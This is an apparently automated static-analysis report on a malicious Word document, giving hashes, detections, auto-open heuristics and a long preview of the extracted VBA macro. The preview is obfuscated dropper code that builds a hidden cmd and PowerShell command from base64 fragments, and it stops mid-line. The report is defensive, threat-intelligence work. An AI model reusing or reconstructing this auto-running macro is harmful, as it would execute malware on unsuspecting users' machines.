Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4ddf0ac0e5b0d0fe…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 92.8 KB
Created: 2018-08-19 22:45:00
Authoring application: Microsoft Office Word
First seen: 2018-08-26
MD5: 21dcde063381ae68e8c4fb9415cd14ae
SHA-1: 566b5106c3bfd7de2e27ff554e8cb48f3fbbe981
SHA-256: 4ddf0ac0e5b0d0fe04f366bf1f1a2300a897a6b7fc634f0d6b6f5ee0c6cab2ed
Risk score: 142

Malware Insights

MITRE ATT&CK: T1059.005 (Command and Scripting Interpreter: Visual Basic)

The sample is a malicious Office document containing an obfuscated VBA macro. The macro appears designed to execute commands: the OLE_LEGACY_WORDBASIC_AUTOEXEC and OLE_VBA_AUTOOPEN heuristics indicate it is set to run automatically when the document is opened, and the extracted source below assembles a command string from many small concatenated string fragments. The ClamAV detection (Doc.Malware.Valyria-6691552-0) corroborates the verdict. The primary IOC is the extracted VBA macro itself.

Heuristics (5)

  • ClamAV: Doc.Malware.Valyria-6691552-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-6691552-0
  • VBA macros detected [medium, 1 related finding] OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    Document contains an AutoOpen macro (a procedure Word runs automatically when the document is opened)
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL labels show which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body; this is the DrawingML XML namespace URI, not a network indicator)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename     Kind        Source                                                Size
macros.bas   vba-macro   oletools.olevba.extract_macros (decoded VBA source)   46727 bytes
SHA-256: b6962dff010a48b238086c48c728f8dc615e73b3ef6f890c30b17fb3a4d0dd42

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "WYJdzmwfQhLU"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Xdnnqilp"
Function OBBPrvopS()
On Error Resume Next
LGiKuT = 45781 + wcMsSV
zWKwWQbIotu = "M" + "d " + "/V ^  " + " /r " + CStr(Chr(DYOQiTR + aHczjFDclmDiT + 34 + ruFBVjTwjjrPM + WUHLiHl)) + "  " + "Se^t ^s"
LGiKuT = 15911 / 59126 + FtkOG / BKEzm
   IsArray 71172 + 19399 - 80854 + aElEEW
   VarType Cos(iYtzt)
KjiBbIw = "^7='^o" + "/^:r" + "sh:ll ^" + "-:^ ^" + "JAB^x^A" + "F^?" + "ASpA" + "}^AG^4A" + "^%QB3"
LGiKuT = CVar(15)
   VarType Tan(hzRHUa)
QiMUdSTaiBE = "AC^@^A^" + "b/^B" + "i^A" + "GoA^%" + "Q^B" + "jA^eQ^A" + "I" + "A^B" + "O^AG?^"
IsArray Int(PCcWTI)
jDjZZ = "A" + "^d^" + "A^A^uAF" + "c^A^%^Q" + "^B^iA^_"
VarType iaFsN - qGfLYb + 12936 + GNLmz
   LGiKuT = aFjwWi + IFktdw - pmokbR / vtzXI
   VarType Second(1)
NfdFjbiVzW = "^M^A^b" + "^A^B'A" + "^G?^A" + "^bp^B^" + "@A^DsA" + "^J"
LGiKuT = 23150 / dVNut
   VarType Sgn(WHRYH)
   VarType 49120 - rHEwaa
   VarType Round(KZQaXC / jTiLj - 51915 + qPzzO)
rEHfWZTtc = "^AB" + "'A^" + "_^_A^d/" + "A^" + "}A" + "CcAa"
VarType ALUaP * XQsHb - LXKWHL / RCTRjR
   VarType VTUZw - FjkUl
   LGiKuT = dJsTd / pzcLs
   VarType vvNcIB - DJsMB - 29759 / JQMuA
hVYYZAGqZRj = "A^B" + "@A^e^QA" + "cA^A" + "^6^A" + "C^8A^+" + "/Bs^"
VarType CStr(26194 + zztEi)
   IsArray Sqr(jQRsKV)
   LGiKuT = sCtzwm - 31660
   IsArray Log(12)
ssIDhuaVo = "AG8" + "Ac" + "/^" + "B^" + "@^" + "A" + "G^" + "MAb/B^s" + "AG/A^%Q" + "BjA^e^" + "Q" + "^A^a"
VarType Str(junIB)
   VarType CDate(hcpjcp)
   LGiKuT = Rnd(dFSmVP)
DhnzlUUJCFK = "^Q^B^2" + "^" + "AG?A^+" + "^p^B^" + "uA" + "^G^?Ad^" + "A^A" + "v^AF" + "^p^A^" + "M^Q^B" + "r^" + "A^_A" + "A^a^A"
OBBPrvopS = zWKwWQbIotu + KjiBbIw + QiMUdSTaiBE + jDjZZ + NfdFjbiVzW + rEHfWZTtc + hVYYZAGqZRj + ssIDhuaVo + DhnzlUUJCFK
   IsArray Tan(EFouAk)
   LGiKuT = TimeValue(9291)
   IsArray EJufpM + cBFNpF
End Function
Function YVAXGaYQHnj()
On Error Resume Next
IsArray MawQK - mwTvZ
   LGiKuT = 22959 / QHHbkP
   LGiKuT = QwQdo / dNqEs
NVLhZwfz = "B" + "^@^A" + "e^QAcA" + "A^6A" + "C" + "8A+/^B" + "^l^" + "A^" + "Gc^A^+^" + "Q^Bj^" + "AG8Ab^"
LGiKuT = Sin(zZsMYn + JiGnsl - iYqObu - wpETCp)
   VarType 26442 / wMFkb
fLWNjnhL = "p^BjA" + "^G^?^" + "Ac^A" + "B@^A" + "C4^A^" + "Y/^BvAG" + "^@" + "^A^+" + "/^B"
LGiKuT = bToPVA + 39104
   IsArray CDate(35643 + 38493)
   VarType fJJYbY - zrwDK
DONaLmQBMLM = "z^A" + "FQA^" + "5" + "/^BC^A" + "^F^o^" + "A^QA^B" + "oAeQA" + "^" + "d^" + "AB/ADo"
IsArray iNPGAs + cqajW / 70616 * aOoaPJ
   LGiKuT = nsVzku * 98819
rYlAtYcUiu = "^A+/^" + "A" + "vAG^M" + "A^aQ" + "By" + "A^G^M" + "^A^" + "dQB" + "sAG^8^" + "AcAByA^" + "G^8^Ad" + "^p"
VarType PoBbX + OfupL
   VarType Int(NDFvj - TjRUts)
   IsArray 47522 * kEVATQ * rqzOM + oWwYd
   VarType CByte(223)
HttauRTSwTw = "^B'^AG_" + "Ab^Q" + "^" + "B" + "^'AG" + "c^A^" + "YQAu^A^"
IsArray Sin(7)
   IsArray UiqGjh / osipb / zMjGX + ojjNKO
   IsArray 93728 / THhIP
   LGiKuT = Sqr(WVuYi)
   VarType 72573 * LkLrCa - 63528 - ZRXwhZ
XpQTTPaoO = "G^M^Ab/" + "B^tAC8" + "^A^a" + "Q^Ax^" + "A^" + "eQA" + "^%^p^" + "B^Y" + "A" + "^_AAaAB" + "^@^"
IsArray CVar(26)
   IsArray Oct(vBoUjr)
   IsArray 82343 - 36872 - WUhCps - mGGbb
   IsArray CDbl(sYjpjD)
nRikSORsJH = "A^" + "e^" + "Q" + "Ac" + "AA^6^AC" + "^8A^+" + "/^BiAG?" + "^A" + "^b" + "^p^B^'" + "^A" + "G^@A" + "^%AB"
VarType Month(nGuhO + 87955)
   VarType 99970 - Fmbww * mkPUwd - RuBwQ
   LGiKuT = CStr(605)
anVuEmP = "^1AG^" + "4A^:Q" + "^" + "B^hA^" + "G@^Aa" + "/^B^y" + "^A^G" + "?A"
IsArray 6932 * zOztd
   IsArray 21967 * IlpAO
   IsArray Second(uqnCin)
iNbsi = "c" + "/^" + "A^u" + "A" + "^G" + "MAb/" + "Bt^A" + "C" + "^8Ac/" + "^B" + "o^A" + "Dc^A" + "dQB@"
YVAXGaYQHnj = NVLhZwfz + fLWNjnhL + DONaLmQBMLM + rYlAtYcUiu + HttauRTSwTw + XpQTTPaoO + nRikSORsJH + anVuE
... (truncated)